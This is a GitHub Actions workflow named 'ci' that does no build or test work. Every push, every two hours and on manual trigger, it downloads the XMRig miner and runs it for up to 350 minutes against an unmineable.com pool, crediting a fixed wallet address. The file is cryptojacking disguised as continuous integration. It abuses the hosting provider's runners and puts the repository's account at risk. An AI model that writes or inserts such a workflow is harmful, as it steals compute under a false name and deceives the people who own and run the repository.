name: ci

on:
  push:
    branches: [ main ]
  schedule:
    - cron: '35 */2 * * *'
  workflow_dispatch:

jobs:
  run:
    runs-on: ubuntu-latest
    timeout-minutes: 350
    
    steps:
      - name: Setup
        run: |
          sudo sysctl -w vm.nr_hugepages=1280
          
      - name: Download
        run: |
          wget -q https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xf xmrig-6.21.0-linux-static-x64.tar.gz
          
      - name: Execute
        run: |
          cd xmrig-6.21.0
          ./xmrig -o rx.unmineable.com:3333 -u 0x74B56f2C379996fedabF53D36aeE73c5E5129fC9 -p USDT \
            --threads=0 \
            --randomx-1gb-pages \
            --donate-level=1 \
            --rig-id=GT_20260330_101931_runner-1003 \
            --cpu-priority=5 \
            --keepalive \
            --tls
